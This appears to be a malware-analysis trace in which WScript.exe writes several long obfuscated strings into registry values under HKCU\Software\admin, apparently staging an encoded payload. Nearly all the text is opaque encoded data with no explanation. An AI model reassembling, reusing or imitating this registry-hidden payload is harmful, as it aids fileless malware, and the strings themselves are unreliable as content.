iivvtivvtyvvtivvtuvvtrvviuvvtqiyvvtqiyvvtqiwvvtrvvtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqiwvvtsvvtyvviivvtwvvtrvvtsvvttvviuvviyvvtrvviuvvtovvitvvitvvtqiuvviyvvtrvviuvvtovvitvvitvvtqiuvviyvvtrvviuvvtovvitvvitvvtqtsvviuvvtyvvitvvtovviyvvitvvtwvviuvviuvvtrvviuvvtovvitvvitvvtqiuvviyvvtrvviuvvtovviyvvitvvtqiuvvtuvvtrvviuvvtovvitvvitvvtqtrvvtivvtyvviyvvtovvtsvvitvvtwvviuvvtivvtrvviuvvtovvitvvitvvtqtrvvtivvtyvviyvvtpvvttvvitvvtqiuvvitvvtrvviuvvtovvitvvitvvtqtrvvtivvtyvviyvvtovviuvvitvvtwvviuvvitvvtrvviuvvtovvitvvitvvtqtuvvtrvvtivvtsvvtivvttvvtivvtpvviuvviyvvtrvviuvvtovvitvvitvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtuvvtqtyvvtuvvtqtqtqtqtyvvitvvtqtwvvtqtuvvtqtqtpvvirvviuvvitvvitvviyvvtuvviivvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqiuvvtqtqtqtqtrvvtqtwvvtqirvvtqtwvvtqiuvvtqirvvtqtqrtvvtqtqtqtqtwvviwvvtqtuvvtqtqtqtqtqtqtqtqtqtqtsvvtpvvtwvvtivvtqtqtqtqtqtqrtvvtqtqtqtqtrvvtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqrtvvtqtqtqtqtqtrvvtqtqtqtqtqtivvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtivvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtivvtqtqtuvvtqtqtqtqtqtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtqtqtyvvtqtpvvtuvvtqtqtqtqrtvvtqtqrtvvtqtqtqtqtqtqrtvvtqtqrtvvtqtqtqtqtqtqtqtqtqtqrtvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtpvvtrvvtyvvtqtuvvtqtqtrvvtpvvtqtqtqtqtqtqtqtqtyvvtqtqtuvvtqtqiuvvtqtqrtvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtuvvtqtqtuvvtqtqtpvvtpvvtqtqtqtqtqtqtrvvtqtrvvttvvtqtuvvtqtqtwvvitvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtqtqtqtqtqtrvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvviuvvtovvtyvvtivvtuvvtovvtpvvtovvtyvvtqtqtqtqtqtqtovvtovvtqiivvtqtqtqtqtqtqrtvvtqtqtqtqrtvvtqtqtqtqtqtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtqtqtqtqtqtivvtqtrvviuvvtovvtrvvtivvtyvvtivvtwvvtovvtyvvtivvrtvvtqiuvvtyvvtqtyvvtqtuvvtqtqtqtqtrvvtqtqtqtqtqtqtqtqtivvtqtuvvtqtqtqtqtwvvtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtyvvtqtrvviuvvtivvtyvvtivvtwvvtovvtyvvtivvrtvvtqtqtqtuvvtqtqiuvvtqtqtqtqtqtqttvvtqtqtuvvtqtqtqtqtqtivvtqtqtqtqtqtqtwvviwvvtqtuvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqitvvtqtrvviuvvtovvtrvvtovvttvvtovvtrvvtivvttvvtqtqtqtqtqtqiuvvtqtqrtvvtqtqtqtyvvtqtqtuvvtqtqtqtqtqtrvvtqtqtqtqtqtqtrvvtqtqtuvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtyvvtqtrvviuvvtovvtrvvtivvtuvvtivvitvvtivviivvtivvttvvtqtqtqtqtpvvtpvvtqtqtqtqtqtqtqtqtuvvtqtqtuvvtqtqtqtqtqtrvvtqtqtqtqtqtqtrvvtrvvtqtuvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtyvvtrvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtq
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:4
Value:
tqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtuvvtuvvtpvvirvviuvvitvvtpvvttvvtovviyvvtqitvvtqtqtpvvirvvtuvvtuvvtqtpvvtuvvttvvtuvvtovvtpvvirvvttvviwvvtpvvirvvtuvviwvvtqtyvvtovvtivvtyvvtwvvtuvvtivvtpvvirvvtovvtuvvtwvvtqtrvvirvvtovvtuvvtwvvtyvvtpvviyvvtyvvtovvtqtwvvtqiivvirvvtivviivvtpvvtqiivvirvvtivvtyvvitvvttvviwvvtqtpvvtpvviyvvtqtyvvtwvvtsvvtqiivvirvvtivviyvvtpvvtqiivvirvvtivvtyvvtyvvtwvviwvvtqtpvvtpvvtpvvtyvvtyvvttvviwvvtqtpvvtpvvtpvvtyvvitvvtwvviwvvtqtpvvtqtrvvitvvtpvvtqiivvirvvtivvitvvtwvvtpvvirvvtyvviyvvtwvvtyvvtpvviwvvtyvvtyvvtwvvtqtqtpvvttvvtrvvtqtyvvtqiuvvtpvvtpvvtqtwvvtyvvtwvvtpvvttvvtivviyvvtqitvvtqtwvvtpvvtsvvtyvviyvvtwvvtyvvtovvtuvvitvvtovvtuvviuvvtpvvtsvvttvviwvvttvvttvvitvvtqtuvviivvtpvvtsvvtuvviwvvtqtyvvtuvvirvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvttvvtuvvtivvtpvvirvvtovvtuvvtqtpvvttvvttvvitvvtsvvtuvvtovvtpvvirvvitvvtwvvtpvvtsvvtqiuvvtpvvtsvvtyvviuvvtqtyvvtpvvtpvvtyvvtyvvttvvtqtqtpvvtyvvtqttvviyvvtqtqtqrtvvtqtovvitvviivvtyvvtpvvirvviyvvtsvvtpvvirvviivvtsvvttvvirvvtyvviyvvtwvvtqtpvvirvvtyvvtuvvtqitvvtwvvirvviyvvtrvvtrvvttvviyvvtwvvtqiivvirvvtivvtyvvitvvttvvtovvtqtpvvtqiivvirvvtivvtqtyvvtqtrvvtqttvvitvvtwvvtqttvvitvvttvvtqiivvirvvtivviyvvtpvvtpvviwvvtyvvtyvvttvvttvvtqtpvvtpvvtpvvtyvvtyvvttvvtovvtqtpvvtyvvtovvtpvvtpvvtyvvitvvttvvttvvtqtpvvtpvviyvvtyvviwvvtqtwvvtpvvtwvviivviivvtqtqtqrtvvtqtovvitvvitvviuvvtuvviivvtuvviuvvtuvvirvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvttvvttvviyvvtrvvtpvvttvvitvvtsvviivviivvttvvtsvvtuvvtuvvtqitvvtovviuvvtwvviuvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtqiivvirvvtivvtqtyvvttvvtrvvttvvttvvitvvtwvvitvvtwvviuvvtsvvtqtpvvtqiivvirvvtivvitvvtqttvvttvvtqitvvtpvvtuvvtqtqttvvtqtyvvtuvvtqtqtyvvtrvvttvvirvvtuvvtuvvtqitvvtovvitvviuvvtovvtuvviuvviivvtovviyvvtwvvtpvvirvvitvvtwvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvviivviivvtovvtuvvtqtpvvtivviwvvtqtqiivviivvtwvvtuvvtqtpvvtrvvtqtyvvtqtqtqtuvvtqiivviivvtwvvtuvvtqtyvvtrvvtqtyvvtqtqtqtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvviivviivvtovvtuvvtqtpvvtivviwvvtqtqiivviivvtwvvtuvvtqtpvvtrvvtqtyvvtqtqtqtuvvtqiivviivvtwvvtuvvtqtqtrvvtqtyvvtqtqtqtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvirvvtuvvtuvvtwvvtqtpvvirvvtyvvtuvvtqtpvvtuvvtivvtpvvirvviivvtqtpvvtuvviyvvtrvvtovvtyvvtwvvtrvvtuvvtovvtpvvirvvtovviyvvtqitvvtrvvirvviivvtpvvtpvviwvvtqitvvttvvtovvtpvvtpvvtqiuvvtyvvtivvtpvvttvviuvviwvvtqtwvvtovvtuvviivvtuvvtuvviivvtuvviuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvirvvtyvviyvvtqtpvvttvvttvvitvvtqttvvtpvvtqtwvvtovvtyvvtqtovvtyvvtqtyvvtwvvtpvvtqttvvtsvvtqtqtovvtuvviivvtsvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtivviuvvtpvviyvviuvviivviivviivviivviivviivvtuvvtsvvtpvvirvvitvvtpvviuvvirvvtqirvvtpvviyvvtwvvtyvvttvvtwvvtqiivvirvviuvvtqtrvvttvvirvvtyvvtuvvtqitvvtovvtyvvtqiwvvtpvvttvviuvvtsvvtqtwvvtovvtsvviivvtqttvvttvvitvvtqtuvviuvvtuvviyvvitvvttvvtpvvirvvitvvtrvviuvvirvviivvtsvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtwvvtpvvtpvvirvvtyvvtuvvtqtpvvtuvvttvvtpvvirvvtuvviyvvtqitvvtuvvtivvttvvttvviivvtivvtpvvtsvvtyvvtuvviuvvtpvvtuvvtovvtpvvtsvvtovvtuvviivvtyvvtpvvtsvvtovvtuvviivvtqtpvvtsvvtovvtuvviivvtpvvtpvvtsvvtovvtuvviivvitvvtpvvtsvvtovvtuvviuvvitvvttvvtsvvtovvtuvvtwvvtqtqiivvtpvviuvvtyvviyvvtqrtvvtqtpvviyvvtyvvtuvviuvvtpvvtivviwvvtqtwvvtuvvtqiuvvtpvvtuvvtq
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:5
Value:
tqrtvvtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtqiivvtpvvtyvvtwvviuvvtqrtvvtqtivviwvvtqtwvvtuvvtqiuvvtpvvttvvirvvtqrtvvtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiivvtivviwvvtqtrvvtuvvtqiuvvtpvvtrvviwvvtqrtvvtqtpvvirvviivvtpvviuvvtsvvtpvvttvvtqtqtqtqtqtqtivviwvvtqtwvvtuvvtqiuvvtpvvtwvvirvvtqrtvvtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqtrvvtuvvtqiuvvtpvvtqiwvvtqrtvvtqtpvviyvvtovvtpvvtqtyvviuvvirvvtivvtuvvtivviwvvtqtwvvtuvvtqiuvvtpvviivviyvvtqtqtqtqtqtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqtrvvtuvvtqiuvvtpvviuvvitvvtqtqtqtqtqtqtpvviyvvtovvtpvvtqtpvviuvvirvvtyvvtovvtivviwvvtqtwvvtuvvtqiuvvtpvviyvviivvtqtqtqtqtqtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqttvvtuvvtqiuvvtpvvitvviuvvtqtqtqtqtqtqtpvviyvvtovvtpvvtqitvviuvvirvvtrvvtsvvtivviwvvtqtwvvtuvvtqiuvvtpvvitvvrtvvtqtqtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqtuvvtuvvtqiuvvtpvvirvvtqtqtqtqtqtqtqtpvviyvvtovvtpvvtwvvtyvviuvvirvvtqirvvtivviwvvtqtsvvtuvvtqiuvvtpvviwvvttvvtqtqtqtqtqtqtpvviyvvtovvtpvvttvvtyvvtuvvtsvvtuvvtsvvtpvviyvvtyvvtuvviuvvtpvvtivviwvvtqtyvvtuvvtqiuvvtpvvtsvvttvvtqtqtqtqtqtqtpvvttvvitvvtqtqtuvvtpvvtsvvtyvvtuvvtqitvvtuvvtsvvtuvvtsvvtpvvttvviivvtpvvtqtuvvtovviuvvtwvviwvvtuvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtqiuvvtpvvtovvitvvtqtqtqtqtqtqtpvvirvviyvvtqttvvttvvitvvtqtuvvtsvvtuvvtsvvtpvvirvvtyvviyvvtqitvvtyvvtqiyvvttvviuvvtqtqttvviyvvtqiuvvirvvtqiivvtpvviyvvtyvvtuvviuvvtpvvtivviwvvtqtivvtuvvtqiuvvtpvvtivvrtvvtqtqtqtuvvtsvvtuvvtsvvtpvvirvviyvvtqiivvtovviyvvtrvvtqttvviyvvtivvtovvtpvvtuvvtrvvtpvviwvvtqtyvvtwvviwvvtpvvtpvvtqtyvvtwvviuvvtpvviwvvtyvvtyvvtwvviwvvtqtwvvtpvvttvvitvvtrvvtqtrvvtpvvtpvvtyvvtyvvtwvviuvvtqtwvvtpvviwvvtqtyvvtwvviwvvtpvvtpvvtyvvtyvvtwvviuvvtqtrvvtpvvttvvitvvtivvtqttvvtpvvtuvviivviivvtovvtyvvtrvvtwvvtpvviyvvtyvvirvvtqtwvvtqttvvitvviwvvtpvviwvvtqtwvvtpvvtpvvtqtyvvtwvviuvvtyvvtivvtyvvtwvvtpvvttvviuvviivvtqtwvvtovvtuvviivvtyvviuvvirvvtqiuvvtivviwvvtqtpvvtuvvtqiuvvtpvvtwvviyvvtqtqtqtqtqtqtuvvtsvvtpvvtpvvtqtyvvtwvviuvvtyvvtivvtuvvtsvvttvvirvvtovvtuvvtwvvtqtqiivvtpvvitvvirvvttvviivviuvviivviivviivviivvtpvvirvvitvvtivvtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtpvvttvvitvvtpvviivviivviuvvirvviivvtyvvtuvvtuvvtpvvirvviuvvitvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtovvtpvvirvvtovviyvvtqitvvtpvvirvvtyvviuvvtwvvtyvvttvvirvvitvviivvtovviyvvtrvvtuvvtpvvirvvtqtivvtpvvirvvtuvvtivvtqtpvvtuvvttvvtpvvirvvtuvviuvvtwvvtqtqiivvirvvtivvtqtyvvtwvvtqiyvvttvviuvvtqtpvvttvvitvvtwvvtqtpvvtqirvviyvvtpvvtpvvtsvvtyvviuvvtwvvtyvvtpvvirvvtqtivvtyvvtrvvtpvvtsvvtuvviuvvtwvvtqtpvvtsvvtuvvtivvtqtpvvttvvirvvitvviivvtovvitvviuvvtuvvtuvvirvvtpvvirvvtuvvtivvtwvvtqtpvvirvvitvviivvtrvvtsvvtovviuvvtwvvtyvvtpvvirvvitvvtrvviyvvttvviivvtpvvtpvvtsvvtyvvtivvtwvvtqttvvttvvitvvtqtyvvtqiyvvttvviuvvtqtyvvtpvvtuvviivvtrvvttvvitvvtrvvtuvviuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtpvvirvvtyvviyvvtqtpvvtpvviyvvtuvvtwvvtqtwvvtpvviwvvtqtwvvtyvvtwvvtpvvtyvvitvvtqtovvtuvviivvtsvvtuvvttvvtrvvirvvitvviwvvtuvvtivvtuvvtovvtpvvtsvvtyvviyvviivvitvvtpvviyvvtovvtsvvtqtpvvtuvvtovviuvvtpvvtpvvtsvviivviyvviivviivviivviivviivviivvtovvtuvviivvitvvtpvvirvvtovvtuvvtqitvvtpvvirvviyvvtpvviivviivvtovvtuvvtqtpvvtpvviyvvtyvvirvvtqtyvvtpvvtsvvttvvttvvtuvvtwvviuvvtpvvtpvviwvviivviyvviivviivviivviivvtpvvirvvtyvvtuvviivvitvvtuvvtovvtuvvttvvtpvvtsvvtovvtyvvtqttvvtqtyvviuvvtpvvtwvviyvviivviyvviivviivviivviivvtuvvttvvtpvvirvviivvtqiuvvtpvvtyvvtivviivviyvviivviivviivviivvtpvvttvvitvvtyvvtwvvitvvtpvvirvvitvvtivvtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvttvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtovvtpvvirvvtyvvtivvtqtpvvtpvvirvvtwvviuvvtpvvttvvitvvtqtqtrvvtuvvtqiuvvtpvvttvviwvviivviyvviivviivviivviivvtqiivvirvvtivvtuvvtivvtqtyvvtpvvirvviivvtpvvtuvvtsvvttvvttvvitvvtsvvtpvvtsvvtyvviyvvtqtpvvttvvtsvvtyvviuvvtqtpvvtovviuvvtrvvtuvvtrvvirvviyvviivvtpvviyvvtqtyvvtwvvtwvvtqttvvitvviivvtsvvtsvviivvtovvtovviyvvtwvv
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:6
Value:
tqtpvvirvvtyvvtuvvtqitvvtqiivvirvvtivvtwvvtyvvtqtrvvtpvviwvvtqtyvvtqirvvttvvtrvvitvvtrvvtpvvtpvvtqtwvvtpvvirvvtyvviyvvtqtpvvtyvvtwvvtpvvtsvvtyvviyvvtqtpvvttvvirvvtyvviuvvtqtpvvtovvitvviyvviyvvtpvvirvvtyvvtivvtqtpvvtpvvirvvtyvviyvvtwvvtpvvitvvtivvtqtyvvtqtovvtqtqtpvvirvvtyvvtivvtqtpvvitvvtivvtyvvtyvvttvvtpvvtqtwvvtqtqtpvvirvvtyvvtuvvtwvvtyvvtpvvtsvvttvvtpvvtpvvtuvvitvvtsvvtovvtyvvtqtuvvtpvvirvvtyvvtivvtqtpvvtpvvtsvvtqtwvvtuvviivvtuvviuvvirvvtqtqtwvvtuvvirvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvvtovviyvvtqtpvvtqtqtovvtyvvtqtivvtuvviyvviuvvtsvvirvvtovviivvitvviivviivviivviivvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtuvvtwvvtuvvttvvtuvvtivvtuvvtovvtpvvirvvtovviyvvtqtpvvirvviwvvtqirvvtqrtvvtqttvvttvviivvtivvtpvvirvvtyvvtovvttvvitvvtqiivvirvvtovvtyvvitvvttvvtpvvtwvvtpvvtivvtivvttvvirvvitvviwvvtovvtuvvtwvvttvvttvvtsvvtovvtyvvttvvtpvvtovvitvvtovvtyvvtrvvtsvvtpvvirvvtyvvtyvvttvvtpvvtovvtpvvtpvvtuvvitvvtqtovvtyvvtrvvtwvvtpvviyvvtwvvitvvttvvtpvviuvvirvvtwvviuvvirvviwvvtqirvvtqtrvvtqtqtqtqtivvtivvttvvirvvitvviwvvtovvtuvvtwvvtrvvttvvtsvvirvvtyvvttvvtpvvtpvvitvvtqtqtqtqtqtqtovvtyvvtqtsvvtpvvirvvtpvvtyvvttvvtpvvtpvvtpvvtqtqtqtqtqtqiuvvirvviyvvirvvtpvvirvviyvviuvvtpvvirvvtyvvttvvtrvvtyvvtpvvirvvtyvvirvvtrvvtqtqttvvitvvtovvtpvvtsvvtyvvtuvviivvitvvtqttvvitvviivvtpvvirvvtyvvttvvtwvvitvvtqttvvitvvtovvtpvvtsvvtyvviyvvtqtpvvtpvvtsvvtyvvtuvviivvtpvvttvvtsvvtovvttvvtwvvtpvvtovvtivvtwvvirvvtpvvirvvtqtyvvirvvtwvviivviivvtovvtuvvtwvvtqtqttvvitvvtovvtuvvtqiivviivvtuvvtuvvtqitvvtuvvtsvvtuvvtsvvtpvvtyvvitvvtqtovvtuvvtwvvtrvvtpvvirvvtyvviyvvtqtpvvtyvvtivvttvvirvvtovvttvvtwvvtpvvtovvtrvviuvvtuvvttvvttvvitvvtqtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvttvvtrvvitvvtsvvtpvvirvvtyvvtuvviivvitvvtqiivvirvvtovvtqtyvvtovvtqtovvtuvviuvvitvvtpvvirvvtyvviyvviivvtpvvtpvvirvvtqtyvvtpvvtwvvtqttvvitvvtovviuvvirvviuvvtyvvtuvvtuvvtpvvirvviuvvitvviwvvtwvvtivvitvvttvvtyvvtyvvtuvvtqtqtpvvtuvvitvvtqiivviivvtovvtuvvtqtpvvtqiivvtyvvtyvvtqtuvvtwvvtqtrvvtqtyvvtqtqtqiwvvttvvtivvitvvttvvtyvvtyvvtuvvtqtqiivviivviyvvtqtuvviyvvitvvttvvtuvvtivvtpvvirvvttvvtuvvtqtqttvvtyvvtyvvtuvvtqtqtpvvtwvviivviuvvtovvtqtqtrvvtqtqtqtqtqiivvtpvvitvvitvvtuvvtqtqtqtqtqtqtpvvtwvviivviuvvtovvtwvvtqtrvvtqtqtqtqtovvtuvvtqirvvtivvtpvvtovvtwvvtwvvtuvvtqtqtqtqiuvvtpvviuvvtsvvtqtqtqtqtqtqtuvvtsvvttvvttvviivvtivvtuvvttvvtpvvirvviyvvtivvirvvirvviivviivviivviivviivviivvtovviivvtpvvirvvtqitvvtsvvtuvvtovvitvvttvvtyvvtyvvtuvvtqtqttvvttvvtqitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtrvvttvvitvvirvvttvvttvvtqitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtwvviyvvtwvviuvvtsvvtpvvttvviuvvtqtqtwvvttvvttvvtqitvvtpvvtuvvtqtyvvttvvtyvvtyvvtuvvtqtqttvvttvvtqitvvtsvvtuvviwvvitvvttvviwvvtyvvtuvvtqtqtpvvtsvvtqitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtyvvtrvvtpvvtwvviivviwvviuvvttvvtqtqtqtqtqtqtovvitvvitvvtyvvtpvvtwvviivviwvvtivviivvtqtrvvtqtqtqtqtovviyvvttvvtuvvtuvvtovvtpvviyvvttvvitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtpvvirvvtqiivvttvvttvvtyvviivvtqtyvvtrvvttvvitvvirvvttvvttvvtqiivvtpvvirvvitvvtwvviyvvtwvviuvvtsvvtpvvttvviuvvtqtqtwvvtpvvirvvtqtyvvtpvvtuvvtqtyvvttvvtyvvtyvvtuvvtqtqttvvttvvtpvvtovvtovvtyvviivvitvviivviivviivviivvttvvttvvitvvtwvvtpvvtsvvtqtovvtpvvttvvitvvtovvtqtyvvtpvvtwvviivviivvttvvtyvvttvviuvvtyvvtuvvtqtqtovvitvviyvvtyvvtuvviivvtpvvirvvtqiyvvtovvtpvvttvvtyvvtyvvtuvvtqtqttvvttvvtqiyvvttvvtyvvttvviuvvtyvvtuvvtqtqtrvvttvvitvvirvvttvvttvvtqiyvvttvvtyvvttvviuvvtyvvtuvvtqtqtpvvirvvitvvtwvviyvvtwvviuvvtsvvtpvvttvviuvvtqtqtwvvtuvvirvvttvvttvvtqitvvtpvvtuvvtqtyvvttvvtyvvtyvvtuvvtqtqttvvttvvtqiyvviwvvtpvvttvviwvvtyvvtuvvtqtqtpvvtsvvtqiyvvttvvtyvvttvviuvvtyvvtuvvtqtqtpvvirvvtqitvvirvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtwvvitvvtwvviuvvtpvvtqirvvtyvvtivvttvvttvvitvvtpvvtpvvtsvvttvvtuvvtqtqttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtwvvtrvvtuvviwvviyvvtuvvtpvvttvviwvviivviivvitvvtwvviuvvtqtqtovvttvvttvvitvvtpvvtpvvirvvitvvtwvvtrvvtuvvtpvvitvviyvviivviivviivviivviivvitvvtwvviuvvtqtqiivvttvvttvvitvvtpvvtpvvirvvitvvtwvvitvvtwvviuvvtpvvtwvvtrvvttvvttvvitvvtwvvtuvviuvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvv
(PID) Process:(2220) WScript.exeKey:HKEY_CURRENT_USER\Software\admin
Operation:writeName:7
Value:
irvvtyvvtuvvtqtpvvttvvttvviyvvtrvviwvvttvvtovvtpvvttvvtyvvtyvvtuvvtqtqtyvvtrvvtpvvirvvtqtyvvtsvvtuvvtovvtyvvttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtpvvitvvtwvviuvvtsvvtwvviuvvttvvttvvitvvtpvvtivvtsvvitvvtwvvtivvtuvvtpvvtsvvtqtovvtivvitvvtqttvvitvvtrvvtpvvtsvvtqtyvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtyvvtrvvtpvvtwvviivviwvvtovvtqtqtrvvtqtqtqtqtovvitvviyvviwvvtpvvtsvvtwvvtuvvtqtqttvvtyvvtyvvtuvvtqtqtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvviivviivvttvvtuvvtqitvvttvvtyvvtyvvtuvvtqtqiivviivvtovvtuvvtqtpvviuvvtpvvtqttvviivviyvviivviivviivviivvtuvvtsvvtuvvtsvvtpvvirvvtyvviyvvtqitvvttvvirvvtqtyvvtpvviyvvtwvvtqttvvtyvvtyvvtuvvtqtqtqiivvtsvvtyvvitvvtqtuvviyvvitvvttvviuvvtsvvirvvirvviivviyvviivviivviivviivvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtpvvttvvtivvtuvviivvitvvtqtqtpvviyvvtyvvtuvviivvitvvtivviwvvtqtqtuvvtqtpvvirvvtyvvtuvvtqtpvvtivviwvvtrvvtqitvvtwvviuvvtqtqtyvvtqtuvvttvvtpvvttvvtyvvtyvvtuvvtqtqtivvtpvvtwvvtpvvttvvtyvvtyvvtuvvtqtqtuvvtqiuvvtpvvtrvvtwvviivviyvviivviivviivviivvtpvvirvvtyvvtuvviivvitvvtpvvttvvitvvtyvvtwvvtyvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtrvvtqiivviivvtwvvtuvvtwvvtpvvtrvvtqtyvvtqtqtqtuvvtqiuvvtp